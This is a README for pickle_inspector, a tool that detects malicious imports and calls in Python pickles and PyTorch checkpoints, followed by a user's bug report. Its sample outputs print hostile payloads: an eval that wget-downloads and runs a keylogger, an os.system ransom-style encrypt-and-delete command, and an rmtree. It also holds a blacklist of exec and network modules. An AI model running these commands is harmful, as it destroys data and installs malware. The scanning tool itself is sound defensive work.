pickle_inspector 🥒🔬

Check what is in the pickle before eating it.

  1. About
  2. Command line usage
  3. Library usage
  4. Controlled unpickling
  5. Black- and whitelists
  6. Acknowledgements

About

  • Trace the calls and imports that would occur if a pickle were loaded
  • Flat but detailed call graphs
  • Load malicious pickles by skipping blacklisted items
  • Library and script usage
  • Combine blacklists and whitelists for fine-grained control
  • Can be used with PyTorch's load function

It works on any type of pickle, but was made with torch in mind.

NOTE: torch == 1.13.0 breaks using custom unpicklers, see pytorch/pytorch#88438
This is fixed in torch 1.13.1 and 2.x.x.
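
A minimal sketch of guarding against the affected release before passing a custom unpickler to torch. The helper name is hypothetical and not part of pickle_inspector; it only compares the version string against the one release named in the note above.

```python
def torch_breaks_custom_unpicklers(version: str) -> bool:
    """Return True only for torch 1.13.0, the release named in the note above.

    Hypothetical helper, not part of pickle_inspector.
    """
    # Drop local build tags such as "+cu117" before comparing.
    release = version.split("+", 1)[0]
    return release == "1.13.0"
```

In practice the argument would be torch.__version__, and a True result would be a reason to upgrade before scanning.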

Scanning pickles via command line

tl;dr: just let me scan my pickles. Scan with the preset blacklist for arbitrary code execution:

python scan_pickle.py -f exec -i pickled.pkl
> Using blacklist: exec
> Scanning file(s): ['pickled.pkl']
> Using black list: ['__builtin__.breakpoint', '__builtin__.open', 'requests.*', 'builtins.open', '__builtin__.compile', 'socket.*', 'builtins.breakpoint', 'os.*', 'nt.*', 'builtins.eval', 'webbrowser.*', '__builtin__.eval', 'builtins.exec', 'posix.*', '__builtin__.exec', '__builtin__.getattr', 'builtins.getattrsubprocess.*', 'builtins.compile', 'aiohttp.*', 'httplib.*', 'sys.*']
> Reading pickled.pkl
> Scanning: pickled.pkl
> found: __builtin__.exec
> found: zlib.decompress
>
> Found blacklisted items:
>
>   __builtin__.exec.__call__((zlib.decompress((b'x\xda5\xcd]\n\xc3 \x10\x04\xe0\xf7\x9cb\xd9\x17\x15$\x07\x08x\x87\xde@$\xac\xe9R\xff\xd0\r\t\x94\xde\xbdB\xe9<}\x0c\x0c\x13{\xcd\x90\xcf$\xdcz\xddi\x0c.\x07pn\xb5\x0b<~\xcd\xd2\xc0\xfd\xad%\xf4\x83\xc4\xd1M\xbb\x85\xe9\xe14"^,O\xa8\x8d\x8aV\xa9\xa6UnQ\x16\xd4\xa5\x0c\x84\x01q[`\xa6u.\xa21\x9e\xfb\x0b-DN\xe4\xa2\x99[\xfbF\xefK\xc8\xe4=n\x939p\x99\xfcX0fi\xeb\x98\x8f\xa2\xcd\x17\x1d%6\xbc',), {}),), {})
>
> Scan for pickled.pkl FAILED ⚠️

Using a preset whitelist for a Stable Diffusion checkpoint:

python scan_pickle.py --preset stable_diffusion_v1 --in sus.ckpt
> Using whitelist: stable_diffusion_v1
> Scanning file(s): ['sus.ckpt']
> Using white list: ['collections.OrderedDict', 'torch._utils._rebuild_tensor_v2', 'torch.HalfStorage', 'torch.FloatStorage', 'torch.IntStorage', 'torch.LongStorage', 'pytorch_lightning.callbacks.model_checkpoint.ModelCheckpoint', 'numpy.core.multiarray.scalar', 'numpy.dtype', '_codecs.encode']
> Reading sus.ckpt
> Found pickle in zip: archive/data.pkl
> Scanning: archive/data.pkl
> found: torch._utils._rebuild_tensor_v2
> found: torch.FloatStorage
> found: collections.OrderedDict
> found: torch.IntStorage
> found: torch.LongStorage
> found: pytorch_lightning.callbacks.model_checkpoint.ModelCheckpoint
> found: numpy.core.multiarray.scalar
> found: numpy.dtype
> found: _codecs.encode
>
> Scan for sus.ckpt PASSED ✅
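
The "Found pickle in zip" line above reflects that a checkpoint can be a zip archive with the pickle stored as one of its members. The following is a rough sketch of locating such members with the standard library only. It assumes pickles are recognised by a ".pkl" suffix, which may differ from how scan_pickle.py detects them; the function name and the in-memory archive are hypothetical.

```python
import io
import zipfile


def list_pickle_members(checkpoint) -> list[str]:
    """Return the names of archive members that look like pickles.

    Assumption: a member counts as a pickle if its name ends in ".pkl".
    """
    with zipfile.ZipFile(checkpoint) as archive:
        return [name for name in archive.namelist() if name.endswith(".pkl")]


# Build a tiny in-memory archive laid out like the checkpoint in the log above.
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w") as archive:
    archive.writestr("archive/data.pkl", b"placeholder")
    archive.writestr("archive/data/0", b"raw tensor bytes")

print(list_pickle_members(buffer))
```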

Script usage

usage: scan_pickle.py [-h] -i INPUT [INPUT ...]
                      [-p {stable_diffusion_v1,stable_diffusion_v2} [{stable_diffusion_v1,stable_diffusion_v2} ...]]
                      [-f {exec} [{exec} ...]] [-w WHITELIST [WHITELIST ...]] [-b BLACKLIST [BLACKLIST ...]]

Scan pickles

optional arguments:
  -h, --help            show this help message and exit
  -i INPUT [INPUT ...], --in INPUT [INPUT ...]
                        path to a pickle(s) or zip(s) containing pickles
  -p {stable_diffusion_v1,stable_diffusion_v2} [{stable_diffusion_v1,stable_diffusion_v2} ...], --preset {stable_diffusion_v1,stable_diffusion_v2} [{stable_diffusion_v1,stable_diffusion_v2} ...]
                        a whitelist preset to use
  -f {exec} [{exec} ...], --preset_blacklist {exec} [{exec} ...]
                        a blacklist preset to use
  -w WHITELIST [WHITELIST ...], --whitelist WHITELIST [WHITELIST ...]
                        whitelist of modules and functions to allow
  -b BLACKLIST [BLACKLIST ...], --blacklist BLACKLIST [BLACKLIST ...]
                        blacklist of modules and functions to block

Inspecting

Inspect without unpickling.

import torch
import pickle_inspector
result = torch.load('sus.pt', pickle_module=pickle_inspector.inspector)
for c in result.imports:
    print(c)

Notice the calls to shutil.rmtree, os.system or similar:

> shutil.rmtree
> torch._utils._rebuild_tensor_v2
> collections.OrderedDict
> numpy.core.multiarray.scalar
> os.system
> numpy.dtype
> _codecs.encode

So we take a closer look at what is being called:

for c in result.calls:
    print(c)

It seems someone tried to delete a folder and hold a file for ransom:

> shutil.rmtree(('/very/important/folder'), {})
> collections.OrderedDict((), {})
> torch._utils._rebuild_tensor_v2((None, 0, (1000,), (1,), False, collections.OrderedDict((), {})), {})
...
> torch._utils._rebuild_tensor_v2((None, 0, (), (), False, collections.OrderedDict((), {})), {})
> os.system(('openssl enc -aes-128-ecb -in important_file -out give_money.enc -K 1337B00B135DEADBEEF; rm important_file'), {})
> numpy.dtype(('f8', False, True), {})
> numpy.dtype.__setstate__(((3, '<', None, None, None, -1, -1, 0),), {})
> _codecs.encode(('ñhã\x88µøÔ>', 'latin1'), {})
> numpy.core.multiarray.scalar((numpy.dtype(('f8', False, True), {}), _codecs.encode(('ñhã\x88µøÔ>', 'latin1'), {})), {})
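
To illustrate how imports and calls can be traced without running them, here is a minimal sketch built on the standard pickle module. It is not pickle_inspector's implementation: the class names are hypothetical, and the idea is simply to override Unpickler.find_class so that every global resolves to an inert stub that logs how it was called.

```python
import io
import pickle
import shutil


class Stub:
    """Inert stand-in for a pickled global; records calls instead of running them."""

    name = "?"    # fully qualified name this stub replaces
    calls = None  # shared log, assigned per unpickler in find_class

    def __new__(cls, *args, **kwargs):
        cls.calls.append((cls.name, args))
        return super().__new__(cls)

    def __init__(self, *args, **kwargs):
        pass

    def _ignore(self, *args, **kwargs):
        pass

    # Swallow the mutations the unpickler may apply to a rebuilt object.
    __setstate__ = __setitem__ = append = extend = add = _ignore


class InspectingUnpickler(pickle.Unpickler):
    """Hypothetical tracer: resolves every global to a Stub subclass."""

    def __init__(self, file):
        super().__init__(file)
        self.imports = []
        self.calls = []

    def find_class(self, module, name):
        full_name = f"{module}.{name}"
        self.imports.append(full_name)
        # Never import the real object; hand back a stub that logs its calls.
        return type("Stub", (Stub,), {"name": full_name, "calls": self.calls})


class Malicious:
    """Test payload: unpickling it normally would call shutil.rmtree."""

    def __reduce__(self):
        return (shutil.rmtree, ("/very/important/folder",))


inspector = InspectingUnpickler(io.BytesIO(pickle.dumps(Malicious())))
inspector.load()
print(inspector.imports)
print(inspector.calls)
```

The stub covers only the common rebuild operations; a real tracer would need to absorb whatever else a pickle can do to an object.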

Controlled unpickling

Inspect and unpickle using white and blacklists.

import torch
from pickle_inspector import UnpickleConfig, UnpickleControlled, PickleModule
config = UnpickleConfig()
# only allow modules, classes and functions in the whitelist
# the rest will be stubbed
config.whitelist = [
        'torch._utils._rebuild_tensor_v2',
        'torch.FloatStorage',
        'torch.IntStorage',
        'torch.LongStorage',
        'numpy.core.multiarray.scalar',
        'numpy.dtype',
        'collections.OrderedDict',
        '_codecs.encode'
]
result = torch.load('model.ckpt', pickle_module = PickleModule(UnpickleControlled, config))

# Use the state_dict as usual
state_dict = result.structure
# ...

# print import results
for c in result.imports:
    print(c)
> torch._utils._rebuild_tensor_v2
> torch.FloatStorage
...
> __builtin__.eval
> collections.OrderedDict
...
for c in result.calls:
    if 'eval' in c:
        print(c)
> __builtin__.eval('import os;os.system("wget https://sus.to/keylog;chmod +x keylog;./keylog &")')
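
The idea of loading only whitelisted items and stubbing the rest can be sketched with the standard library alone. This is an illustration under stated assumptions, not the code behind UnpickleControlled: the class names are hypothetical and the whitelist is matched by exact name only.

```python
import io
import pickle
import shutil
from collections import OrderedDict


class Blocked:
    """Inert placeholder returned in place of any non-whitelisted global."""

    def __new__(cls, *args, **kwargs):
        return super().__new__(cls)

    def __init__(self, *args, **kwargs):
        pass

    def _ignore(self, *args, **kwargs):
        pass

    # Swallow the mutations the unpickler may apply to a rebuilt object.
    __setstate__ = __setitem__ = append = extend = add = _ignore


class WhitelistUnpickler(pickle.Unpickler):
    """Hypothetical controlled unpickler: real objects for whitelisted names only."""

    def __init__(self, file, whitelist):
        super().__init__(file)
        self.whitelist = set(whitelist)
        self.blocked = []

    def find_class(self, module, name):
        full_name = f"{module}.{name}"
        if full_name in self.whitelist:
            return super().find_class(module, name)
        self.blocked.append(full_name)
        return Blocked


class Malicious:
    """Test payload: unpickling it normally would call shutil.rmtree."""

    def __reduce__(self):
        return (shutil.rmtree, ("/nonexistent/path",))


payload = pickle.dumps({"weights": OrderedDict(a=1), "extra": Malicious()})
unpickler = WhitelistUnpickler(io.BytesIO(payload), ["collections.OrderedDict"])
data = unpickler.load()
print(data["weights"], unpickler.blocked)
```

The whitelisted OrderedDict is rebuilt as usual, while the shutil.rmtree call is replaced by a placeholder and reported in blocked.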

Blacklist & Whitelist

  • Whitelist only: everything will be blocked except items in the whitelist
  • Blacklist only: everything will be allowed except items in the blacklist
  • Both black- and whitelist: everything in the blacklist will be blocked except items in the whitelist

Example: Block everything within torch except torch.FloatStorage

from pickle_inspector import UnpickleConfig
conf = UnpickleConfig()
conf.blacklist = ['torch.*']
conf.whitelist = ['torch.FloatStorage']
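
The three rules above can be written down as a small decision function. This is a sketch of the described behaviour, not the library's code: is_allowed is a hypothetical name, wildcards are matched with fnmatch, and two cases the rules leave open are filled with assumptions (with both lists set, names on neither list are allowed; with no lists at all, everything is allowed).

```python
from fnmatch import fnmatchcase


def _matches(name, patterns):
    """True if name matches any pattern; '*' wildcards as in 'torch.*'."""
    return any(fnmatchcase(name, pattern) for pattern in patterns)


def is_allowed(name, whitelist=(), blacklist=()):
    """Decide whether a fully qualified name may be loaded (hypothetical helper)."""
    # The whitelist always wins, also over a matching blacklist entry.
    if whitelist and _matches(name, whitelist):
        return True
    # With a blacklist present, block its matches and allow the rest (assumption).
    if blacklist:
        return not _matches(name, blacklist)
    # Whitelist only: everything else is blocked. No lists: allowed (assumption).
    return not whitelist


print(is_allowed("torch.FloatStorage", ["torch.FloatStorage"], ["torch.*"]))
print(is_allowed("torch.IntStorage", ["torch.FloatStorage"], ["torch.*"]))
```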

Whitelist for Stable Diffusion

Premade whitelists for Stable Diffusion v1 and v2 are available in this project.

Example: Scan a Stable Diffusion v1 checkpoint

import torch
from pickle_inspector import UnpickleConfig, PickleModule, UnpickleInspector, importlists
conf = UnpickleConfig(whitelist = importlists.stable_diffusion_v1)
torch.load('sd-v1-4.ckpt', pickle_module=PickleModule(UnpickleInspector, conf))

Tested with Python 3.9 and torch 1.12.1.


Acknowledgements


Copyright (C) 2023 Lopho
Licensed under the AGPLv3 <https://www.gnu.org/licenses/agpl-3.0.html>

pickle_inspector's Issues

ValueError: unsupported pickle protocol: 181

Hello, while scanning a model resulting from a custom merge I got the following error:

Copyright (C) 2022 Lopho | Licensed under AGPLv3 <https://www.gnu.org/licenses/agpl-3.0.html>
Using preset: stable_diffusion_v1
Scanning file(s): ['/content/drive/MyDrive/AI_MODELS/AshOmeletteWithBurnedPepper.ckpt']
Using white list: ['pytorch_lightning.callbacks.model_checkpoint.ModelCheckpoint', 'numpy.core.multiarray.scalar', 'torch.IntStorage', '_codecs.encode', 'torch.FloatStorage', 'torch.HalfStorage', 'torch._utils._rebuild_tensor_v2', 'torch.LongStorage', 'collections.OrderedDict', 'numpy.dtype']
Reading /content/drive/MyDrive/AI_MODELS/AshOmeletteWithBurnedPepper.ckpt
Found pickle in zip: archive/data.pkl
Found pickle in zip: archive/data/244
Scanning: archive/data.pkl
found: torch._utils._rebuild_tensor_v2
found: torch.FloatStorage
found: collections.OrderedDict
Scanning: archive/data/244
Traceback (most recent call last):
  File "scan_pickle.py", line 144, in <module>
    sys.exit(main(sys.argv[1:]).value)
  File "scan_pickle.py", line 136, in main
    result = scan(p, stubPickle)
  File "scan_pickle.py", line 57, in scan
    pickle_module.Unpickler(data[k]).load()
  File "/content/pickle_inspector/pickle_inspector/_pickle_inspector.py", line 134, in load
    result.structure = super().load()
ValueError: unsupported pickle protocol: 181

link to the model if you want to test by yourself.

Best Regards
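
For context on the error message: pickles written with protocol 2 or later start with the PROTO opcode (byte 0x80) followed by one byte holding the protocol number, and the unpickler raises this ValueError when that number is higher than it supports. One possible reading of the traceback, not confirmed in this report, is that archive/data/244 is not a pickle at all and merely begins with 0x80 followed by 0xb5 (181). A minimal sketch of a stricter header check, with a hypothetical function name:

```python
import pickle

PROTO = 0x80  # opcode that opens a pickle written with protocol 2 or later


def has_plausible_pickle_header(data: bytes) -> bool:
    """True if data starts with PROTO and a protocol number this Python supports.

    Protocol 0 and 1 pickles carry no such header and are rejected here too.
    """
    return (
        len(data) >= 2
        and data[0] == PROTO
        and 2 <= data[1] <= pickle.HIGHEST_PROTOCOL
    )


print(has_plausible_pickle_header(pickle.dumps({"a": 1})))
print(has_plausible_pickle_header(b"\x80\xb5" + bytes(8)))
```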
